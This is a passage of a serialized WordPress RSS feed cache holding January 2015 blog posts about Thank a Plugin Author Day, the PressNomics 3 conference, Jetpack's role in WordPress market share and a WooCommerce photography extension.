2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37980\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"http://wptavern.com/thank-a-plugin-author-day-2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2579:\"<p><a title=\"https://wordpress.org/news/2009/01/thank-a-plugin-developer-day/\" href=\"https://wordpress.org/news/2009/01/thank-a-plugin-developer-day/\">Created by Matt Mullenweg in 2009,</a> when the <a title=\"https://wordpress.org/plugins/\" href=\"https://wordpress.org/plugins/\">plugin directory</a> hosted only 4K plugins, Thank a Plugin Author Day (January 28th) motivates users to thank plugin authors.</p>\n<p>There are several ways to celebrate the event, such as visiting the plugin author&#8217;s website. The link is usually available via the plugin&#8217;s page on WordPress.org. You can also find a link to the author&#8217;s website by searching for the plugin in the backend of WordPress. Also, most plugins in the directory have a link to give a monetary donation.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/PluginDonationLink.png\" rel=\"prettyphoto[37980]\"><img class=\"size-full wp-image-38009\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/PluginDonationLink.png?resize=975%2C527\" alt=\"Plugin Donation Link\" /></a>Plugin Donation Link\n<p>Another way to thank plugin authors is to rate and review their plugins. Ratings and reviews are <a title=\"http://wptavern.com/rate-and-review-a-wordpress-plugin-day-set-for-october-17th\" href=\"http://wptavern.com/rate-and-review-a-wordpress-plugin-day-set-for-october-17th\">an easy way to send feedback</a> directly to an author. Make sure to provide actionable feedback instead of one or two-word reviews. A side effect of rating and reviewing plugins, is that it&#8217;s one of many ways to contribute back to the WordPress project.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/11/BillionThanksFeaturedImage.png\" rel=\"prettyphoto[37980]\"><img class=\"size-full wp-image-34331\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/11/BillionThanksFeaturedImage.png?resize=796%2C267\" alt=\"Billion Thanks Featured Image\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/opensourceway/7007768456/\">opensourceway</a> &#8211; <a href=\"http://creativecommons.org/licenses/by-sa/2.0/\">cc</a>\n<p>Since the holiday&#8217;s creation, over 31K plugins have been added to the directory which results in nearly 36K reasons to use WordPress! <strong>Thank you</strong> to anyone who has ever published a WordPress plugin whether it&#8217;s on the <a title=\"https://wordpress.org/plugins/\" href=\"https://wordpress.org/plugins/\">official directory</a> or on GitHub. Without so many plugins, I wouldn&#8217;t be able to customize WordPress to make it my own.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 07:05:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:42;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WPTavern: Envato Stats, Tips For Getting Things Done, and More at PressNomics 3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37944\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:10754:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/WelcomeToPressNomicsFeaturedImage.png\" rel=\"prettyphoto[37944]\"><img class=\"size-full wp-image-37971\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/WelcomeToPressNomicsFeaturedImage.png?resize=671%2C288\" alt=\"PressNomics Introduction\" /></a>PressNomics Introduction\n<p>Last week, I attended the third annual <a title=\"http://pressnomics.com/\" href=\"http://pressnomics.com/\">PressNomics conference</a> in Phoenix, AZ. The event focuses on the business side of the WordPress ecosystem and provides opportunities for business owners to learn from those who are blazing a path towards success. On the evening before PressNomics, I joined several business owners for dinner.</p>\n<p>A half hour into the meal, I listened intently to various conversations taking place around the table. Topics of conversation included: market segments, customer satisfaction, and business partnerships. At this point I realized I was definitely at a business conference.</p>\n<h2>The Family Delivers Opening Remarks</h2>\n<p>Joshua and Sally Strebel along with their kids, appeared on stage and delivered the opening remarks. It&#8217;s as if the family invited every attendee into their home for a family reunion.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p><a href=\"https://twitter.com/hashtag/PressNomics?src=hash\">#PressNomics</a> is getting started! <a href=\"http://t.co/DqFGdEidK4\">pic.twitter.com/DqFGdEidK4</a></p>\n<p>&mdash; Brian Krogsgard (@Krogsgard) <a href=\"https://twitter.com/Krogsgard/status/558295522725752833\">January 22, 2015</a></p></blockquote>\n<p></p>\n<p>Despite several competing businesses, companies, and products under one roof, I witnessed so many small groups of people discussing strategy as if they&#8217;re all friends. I felt a positive energy amongst the crowd and several attendees left the event in high spirits, ready to take their businesses to the next level.</p>\n<h2>Session Highlights</h2>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/30-Medium.jpg\" rel=\"prettyphoto[37944]\"><img class=\"size-full wp-image-37973\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/30-Medium.jpg?resize=1024%2C768\" alt=\"A Room Full of Knowledge Seekers\" /></a>Name the people in this image\n<p>The room was packed with attendees for every session since PressNomics chose not to record or live stream the event. The following is a list of memorable points from the sessions I enjoyed most.</p>\n<p><strong>Joshua Strebel interviews Dre Armeda</strong></p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/35-Medium.jpg\" rel=\"prettyphoto[37944]\"><img class=\"wp-image-37976 size-full\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/35-Medium.jpg?resize=1024%2C768\" alt=\"Joshua Strebel Interviews Dre Armeda\" /></a>Joshua Strebel Interviews Dre Armeda\n<p>Joshua Strebel interviewed Dre Armeda on stage with a bottle of scotch. Aremda described how he became involved with WordPress and founded <a title=\"https://sucuri.net/\" href=\"https://sucuri.net/\">Sucuri</a>, where he turned a two-person part-time hobby into a multi-million dollar, 30+ employee company. He also talked about his role as Vice President of Operations for <a title=\"http://webdevstudios.com/\" href=\"http://webdevstudios.com/\">WebDevStudios</a>.</p>\n<p><strong>Ben Chan</strong></p>\n<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/40-Medium.jpg\" rel=\"prettyphoto[37944]\"><img class=\"size-full wp-image-37978\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/40-Medium.jpg?resize=1024%2C768\" alt=\"Envato Stats via Ben Chan\" /></a>Envato Stats via Ben Chan\n<p>Ben Chan is the Director of Growth and Revenue at <a title=\"http://market.envato.com/\" href=\"http://market.envato.com/\">Envato</a>. The statistics he shared confirm that Envato is a huge player in various markets such as WordPress themes, audio files, and plugins. His slides are not available online, but I archived a few stats using Twitter. &#8220;Note that the earnings are before Envato takes their cut.&#8221;</p>\n<ul>\n<li>In the first 30 days, the <a title=\"http://themeforest.net/item/automotive-car-dealership-business-wordpress-theme/9210971\" href=\"http://themeforest.net/item/automotive-car-dealership-business-wordpress-theme/9210971\">Automotive theme</a> on ThemeForest had 300+ sales generating over $15K in sales.</li>\n<li>In less than 10 months, the WPlus theme had over 4K+ sales.</li>\n<li>In 2014, Visual Composer was the best selling plugin on CodeCanyon. The second best product is built on top of it.</li>\n<li>Easy Social Share buttons plugin by Appscreo has over 6K+ sales on CodeCanyon.</li>\n<li>Of the top 50 selling WordPress themes in 2014, 67% are new to the list versus 2013.</li>\n<li>79% of themes describe themselves as responsive, but make up 93% of overall earnings.</li>\n<li>Only 4% of themes in the ThemeForest marketplace have earned less than $1K in their lifetime.</li>\n<li>Envato supports initiatives in the WordPress community. One example is <a title=\"http://wptavern.com/buddypress-bbpress-and-glotpress-development-campaign-is-now-fully-funded\" href=\"http://wptavern.com/buddypress-bbpress-and-glotpress-development-campaign-is-now-fully-funded\">funding John James Jacoby</a> to work on GlotPress, bbPress, and BuddyPress full-time for six months.</li>\n</ul>\n<p><strong>Selena Larson</strong></p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>Helpful tips from <a href=\"https://twitter.com/selenalarson\">@selenalarson</a> on how startups can pitch, including getting known thru good comments <a href=\"https://twitter.com/hashtag/Pressnomics?src=hash\">#Pressnomics</a> <a href=\"http://t.co/c3hufKKspb\">pic.twitter.com/c3hufKKspb</a></p>\n<p>&mdash; Danny Sullivan (@dannysullivan) <a href=\"https://twitter.com/dannysullivan/status/558664527303041025\">January 23, 2015</a></p></blockquote>\n<p></p>\n<p><a title=\"http://selenalarson.com/\" href=\"http://selenalarson.com/\">Selena Larson</a> who writes for <a title=\"http://www.dailydot.com/authors/selena-larson/\" href=\"http://www.dailydot.com/authors/selena-larson/\">the Daily Dot</a>, shared tips on how businesses can receive press by improving their pitches. I agreed with pretty much everything she said on the matter and hope those in attendance took notes. Here are a few highlights:</p>\n<ul>\n<li>Stop using jargon to pitch a product because no one talks like that.</li>\n<li>Describe your product, service, or business in two sentences or less.</li>\n<li>Balance your innovation with something that’s familiar. Don’t talk to reporters as if they’re investors because they’re not.</li>\n<li><a title=\"http://www.producthunt.com/\" href=\"http://www.producthunt.com/\">Product Hunt</a> is a good way to test the market or pitch a product without involving the press.</li>\n</ul>\n<p>As bonus material, be sure to read our guide on <a title=\"http://wptavern.com/tips-for-promoting-newly-released-wordpress-plugins\" href=\"http://wptavern.com/tips-for-promoting-newly-released-wordpress-plugins\">how to promote newly released plugins</a>.</p>\n<p><strong>Danny Sullivan</strong></p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/51-Medium.jpg\" rel=\"prettyphoto[37944]\"><img class=\"size-full wp-image-37982\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/51-Medium.jpg?resize=1024%2C768\" alt=\"SEO With Danny Sullivan\" /></a>SEO With Danny Sullivan\n<p>Danny Sullivan, who is a Founding Editor of <a title=\"http://searchengineland.com/author/danny-sullivan\" href=\"http://searchengineland.com/author/danny-sullivan\">Search Engine Land</a>, presented on the topic of SEO. It&#8217;s a topic I&#8217;ve stayed away from and don&#8217;t talk about much, but Sullivan&#8217;s presentation was not only entertaining, it was enlightening. He showed a brief history of the Google homepage and described why numerous claims of SEO being dead are false.</p>\n<p>The one thing I took away from his presentation is that SEO will never die, but continue to evolve. Because of Sullivan&#8217;s presentation, I&#8217;m going to open my mind to SEO instead of writing it off.</p>\n<p><strong>Chris Lema</strong></p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>Things <a href=\"https://twitter.com/chrislema\">@chrislema</a> does daily <a href=\"https://twitter.com/hashtag/pressnomics?src=hash\">#pressnomics</a> <a href=\"https://twitter.com/hashtag/gtd?src=hash\">#gtd</a> <a href=\"http://t.co/WIBAlTCTkW\">pic.twitter.com/WIBAlTCTkW</a></p>\n<p>&mdash; Remkus de Vries (@DeFries) <a href=\"https://twitter.com/DeFries/status/558765203836268546\">January 23, 2015</a></p></blockquote>\n<p></p>\n<p>The CTO and Chief Strategist at <a href=\"http://crowdfavorite.com/\">Crowd Favorite</a>, Chris Lema, is one of my favorite speakers. He knows how to tell a story and keep the audience engaged. For this presentation, Lema shared tips and disciplines for getting things done. My favorite tip from his session is to start the day writing a list of three things you need to get done. Getting 2-3 items finished each day builds confidence and provides a historical record of things that are done.</p>\n<p>His stance on putting family first is an important strategy I need to work on. So far, listing three things to accomplish each day is working. I feel better about myself and it&#8217;s helping me figure out when I&#8217;ve had a good day.</p>\n<p>The last session featured Joshua Strebel interviewing Matt Mullenweg on stage, but I&#8217;m going to dissect that session in a separate post.</p>\n<h2>A Lot of Fun</h2>\n<p>Not only are the Strebels great hosts, they donated over $10K of proceeds from the event to the <a title=\"http://www.curesearch.org/\" href=\"http://www.curesearch.org/\">CureSearch</a> for Children&#8217;s Cancer charity. If there&#8217;s a PressNomics 4 and you&#8217;re involved in the economics of WordPress, I highly encourage you to attend.</p>\n<p>My goal was to be a fly on the wall for as many conversations as possible and I feel like I&#8217;ve accomplished that goal. I wouldn&#8217;t be surprised if several strategic partnerships are announced in the next few months with PressNomics being the birth place of the conversation.</p>\n<p>If you can&#8217;t wait for PressNomics 4, consider attending <a title=\"http://prestigeconf.com/tickets/\" href=\"http://prestigeconf.com/tickets/\">Prestige Las Vegas</a>, NV, February 27-28th. Similar to PressNomics, it&#8217;s a conference focused on the business side of WordPress.</p>\n<p>Here are a few other photos from the event.</p>\n<a href=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3#gallery-37944-1-slideshow\">Click to view slideshow.</a>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 06:00:28 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:43;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"Matt: Kitchensink WP podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44636\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://ma.tt/2015/01/kitchensink-wp-podcast/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:180:\"<p><a href=\"http://kitchensinkwp.com/podcast-e048-interview-with-matt-mullenweg/\">I hopped on a podcast with Kitchensink WP to chat about the latest in the WordPress world</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 27 Jan 2015 23:35:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:44;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: How Important is Jetpack on WordPress’ Road to 50% Market Share?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37907\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"http://wptavern.com/how-important-is-jetpack-on-wordpress-road-to-50-market-share\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:10465:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/07/jetpack-logo.gif\" rel=\"prettyphoto[37907]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/07/jetpack-logo.gif?resize=700%2C276\" alt=\"jetpack-logo\" class=\"aligncenter size-full wp-image-27470\" /></a></p>\n<p>This past weekend, 250 professionals gathered in Phoenix, Arizona for <a href=\"http://pressnomics.com/\" target=\"_blank\">Pressnomics</a>, a three-day event focused on entrepreneurship in the WordPress economy. During the last day, attendees had the opportunity to watch Pagely CEO <a href=\"http://saint-rebel.com/\" target=\"_blank\">Joshua Strebel</a> interview Matt Mullenweg. Although the session wasn&#8217;t recorded, the audience tweeted out the highlights of the interview, and discussion continued on Twitter.</p>\n<p>Strebel pressed Mullenweg on Automattic&#8217;s agenda behind <a href=\"http://jetpack.me/\" target=\"_blank\">Jetpack</a>.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>At <a href=\"https://twitter.com/hashtag/pressnomics?src=hash\">#pressnomics</a> <a href=\"https://twitter.com/strebel\">@strebel</a> refers to Jetpack as a Trojan Horse to <a href=\"https://twitter.com/photomatt\">@photomatt</a>, room goes silent</p>\n<p>&mdash; Yeti Support (@YetiSupport) <a href=\"https://twitter.com/YetiSupport/status/558772539032219648\">January 23, 2015</a></p></blockquote>\n<p></p>\n<p>This resulted in one of the most controversial statements to come out of the event:</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>“In the absence of <a href=\"https://twitter.com/jetpack\">@Jetpack</a>, I believe <a href=\"https://twitter.com/hashtag/WordPress?src=hash\">#WordPress</a> would be declining.” &#8211; <a href=\"https://twitter.com/photomatt\">@photomatt</a> <a href=\"https://twitter.com/hashtag/pressnomics?src=hash\">#pressnomics</a></p>\n<p>&mdash; Antony McGregor Dey (@antonymd) <a href=\"https://twitter.com/antonymd/status/558772451199299584\">January 23, 2015</a></p></blockquote>\n<p></p>\n<p>Mullenweg further clarified his statement on Twitter, essentially identifying Jetpack as a tool to bolster the platform against competition. Jetpack allows users to gain access to professionally-supported third party integrations without WordPress being forced to dump all of these features into the core software.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p><a href=\"https://twitter.com/zedejose\">@zedejose</a> <a href=\"https://twitter.com/mkalina\">@mkalina</a> <a href=\"https://twitter.com/jetpack\">@jetpack</a> <a href=\"https://twitter.com/antonymd\">@antonymd</a> Naked WordPress (without plugins) is not competitive to Wix, Weebly, Squarespace, etc.</p>\n<p>&mdash; Matt Mullenweg (@photomatt) <a href=\"https://twitter.com/photomatt/status/559559918898794496\">January 26, 2015</a></p></blockquote>\n<p></p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p><a href=\"https://twitter.com/mkalina\">@mkalina</a> <a href=\"https://twitter.com/jetpack\">@jetpack</a> <a href=\"https://twitter.com/antonymd\">@antonymd</a> <a href=\"https://twitter.com/zedejose\">@zedejose</a> You should consider the rest: There\'s secular decline of non-mobile, non-social publishing systems.</p>\n<p>&mdash; Matt Mullenweg (@photomatt) <a href=\"https://twitter.com/photomatt/status/559532172596359168\">January 26, 2015</a></p></blockquote>\n<p></p>\n<p>Jetpack-enabled blogs have more features available to them on the WordPress mobile apps, which are wholly sponsored by Automattic. Many self-hosted WordPress users don&#8217;t appreciate the fact that the mobile apps are packed full of WordPress.com features, but, at the moment, there are no superior alternatives. In our most recent <a href=\"http://wptavern.com/matt-mullenweg-on-ensuring-the-future-of-wordpress\" target=\"_blank\">interview with Mullenweg</a>, he deftly addressed the friction caused by <a href=\"http://wptavern.com/poll-who-uses-reader-in-the-wordpress-mobile-apps\" target=\"_blank\">the preeminence of WordPress.com’s Reader in the app</a>, which he sees as a gateway that simplifies the onboarding process for new users.</p>\n<blockquote><p>I see it as a gateway drug and it gives people more options down the road. If we don’t do anything on mobile, five years from now, when everyone is only using mobile devices, they will all have Squarespace’s or Weebly’s. WordPress is still around but it just doesn&#8217;t matter. This allows us to matter five years from now.</p></blockquote>\n<p>With both Jetpack and the mobile apps, Mullenweg sees an opportunity for Automattic to provide functionality that goes beyond the core publishing experience to offer mobile access and connect users with readers and commenters via social networks.</p>\n<h3>The Road to 50% Market Share</h3>\n<p>In a recent <a href=\"http://kitchensinkwp.com/podcast-e048-interview-with-matt-mullenweg/\" target=\"_blank\">interview with Adam Silver on the KitchensinkWP podcast</a>, Mullenweg gave a better overall picture of his next goal for WordPress and how he sees the platform reaching more users in the future. The software is currently used on <a href=\"http://w3techs.com/technologies/overview/content_management/all\" target=\"_blank\">23.3% of websites worldwide</a> and is on track to reaching 25% before the end of the year. Mullenweg hopes to grow that number to 50%:</p>\n<blockquote><p>The next goal is the majority of websites. We want to get to 50%+ and there&#8217;s a lot of work between now and then. As the percentage increases, it gets harder and harder to grow the market share, and we have to grow the market share by doing things we haven&#8217;t done in the past &#8211; really thinking about the onboarding process, really thinking about the integration with social networks, and with how WordPress works on touch devices, which is going to be the predominant computing platform of the future. These things are going to be really important.</p>\n<p>What got us here isn&#8217;t going to get us there. Once we get to 50%, we can decide something new we want to do.</p></blockquote>\n<p>With a focus on the onboarding process, integration with social networks, and mobile publishing, Mullenweg is outlining how he sees the mobile apps and Jetpack entering the picture to grow the market share and prevent the decline of the platform.</p>\n<p>For Mullenweg, a 50% market share with a growing international user base isn&#8217;t a purely business goal, but rather ties back in with WordPress&#8217; mission to democratize publishing with open source software. In response to Silver&#8217;s question on whether or not the recent focus on the mission is connected to an increase in non-English downloads, Mullenweg replied:</p>\n<blockquote><p>The big assumption in what we&#8217;re doing is that there&#8217;s an inherent goodness to the transparency and the ability for people to publish. Of course people use WordPress to publish things I personally disagree with or might find morally odious. But it&#8217;s very important that we provide the people the opportunity to have that voice. </p>\n<p>By giving everyone equal ability and access to reach the web, you&#8217;re a click away from several billion people. But you&#8217;re not if you don&#8217;t have the tools to really reach them. It&#8217;s not hunger or clean water or any of the big problems that society has, climate change, but at least for our little part in it, I think we can make a pretty big dent in it.</p></blockquote>\n<p>Mullenweg knew that WordPress had the potential to have an enormous impact on the world of publishing, even when the software was still batting in the minor leagues. WordPress.com was originally created to help users set up blogs while bypassing what used to be a complicated hosting and installation process. Over the years, as WordPress.com adapted more sophisticated ways of supporting the average WordPress user, the idea of Jetpack was born to connect self-hosted blogs with the same features.</p>\n<p>The question is whether or not Jetpack and the mobile apps are the missing link for helping users get connected to billions of people. While Jetpack&#8217;s features aren&#8217;t necessarily unique, they are professionally-supported and users feel safe banking on the plugin for the foreseeable future.</p>\n<p>Mullenweg&#8217;s controversial statement about WordPress being in decline without Jetpack was phrased as conjecture, because there&#8217;s no objective way to prove this unless you remove Jetpack from the picture entirely. As he further explained in his Twitter reply, the notion is based on witnessing the decline of other publishing systems that aren&#8217;t innovating with social or mobile features.</p>\n<p>Those who disagree with the statement object to the idea of hinging the success of WordPress&#8217; market share on a plugin produced by a commercial entity. This is especially provocative when it comes to mobile, as Automattic&#8217;s agenda to promote WordPress.com features goes unrivaled. Nevertheless, WordPress wouldn&#8217;t have a mobile publishing platform without the company&#8217;s subsidy of the open source apps.</p>\n<p>If WordPress is dependent on Jetpack to continue building its market share to 50%, then the software&#8217;s future is inextricably tied to Automattic&#8217;s continued success. The company is one of a small few that have the capital to invest in a major plugin like Jetpack along with the ongoing improvement of the mobile apps.</p>\n<p>&#8220;Last year, Automattic raised a bit more funding than we have in the past,&#8221; Mullenweg told Silver in his interview. &#8220;It&#8217;s actually bigger than most IPO&#8217;s. We raised $160 million and that gives us a lot of capital to invest into the community. We&#8217;re able to make bigger bets, longer term bets, and it also solidifies us as an independent entity for many years to come.&#8221;</p>\n<p>The WordPress open source project can still be considered a success in terms of its mission, even if it doesn&#8217;t achieve a dominant market share. Tying its growth to Jetpack is a bold statement that eclipses some of WordPress&#8217; best qualities, such as its rigid adherence to protecting user freedoms with the GPL, the strong community of contributors, and the massive ecosystem of products and services surrounding it. The availability of Jetpack may be one factor responsible for WordPress&#8217; growing market share, but I don&#8217;t think it&#8217;s the sole tool saving WordPress from decline.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 27 Jan 2015 22:27:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:45;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"Post Status: WooCommerce is going after photography\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://poststatus.com/?p=7728\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"https://poststatus.com/woocommerce-photography/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7576:\"<p>Photography is a huge &#8212; and quite competitive &#8212; market. WooThemes has one nice advantage, in that they are quite dominant in the eCommerce space.</p>\n<p>However, catering to actually selling photos is a whole new world. You&#8217;re talking about competing with dozens of services, some quite vertically integrated (from website, to photo management, to photo fulfillment), to a very picky audience full of people with unique workflows.</p>\n<p>I am not a photographer. However, last year I did a ton of research on photography product potential in the WordPress space. I was working with <a href=\"http://ran.ge\">Range</a>, and we were exploring creating our own photography product. I interviewed a dozen professional photographers in person, ranging in industry, experience, and company size.</p>\n<p>I learned a lot during that research phase; and one thing I learned is that this is no easy venture.</p>\n<p>The new WooCommerce photography extension does one thing quite nicely: it allows a photographer to create albums where customers can bulk purchase photos, and it allows the photographer to upload the photos for purchase, as well as protect the albums so that only the photography client can view them.</p>\n<p>You can view a marketing video, walkthrough video, and screenshots for <a href=\"http://www.woothemes.com/products/woocommerce-photography/\">WooThemes&#8217; Photography extension</a> on the dedicated product page.</p>\n<h3>Considerations for true professional photo management / sales</h3>\n<p>However, that is one piece of the puzzle. This plugin makes the client-side of ordering relatively painless, but there are other elements to think about:</p>\n<ul>\n<li>Narrowing an 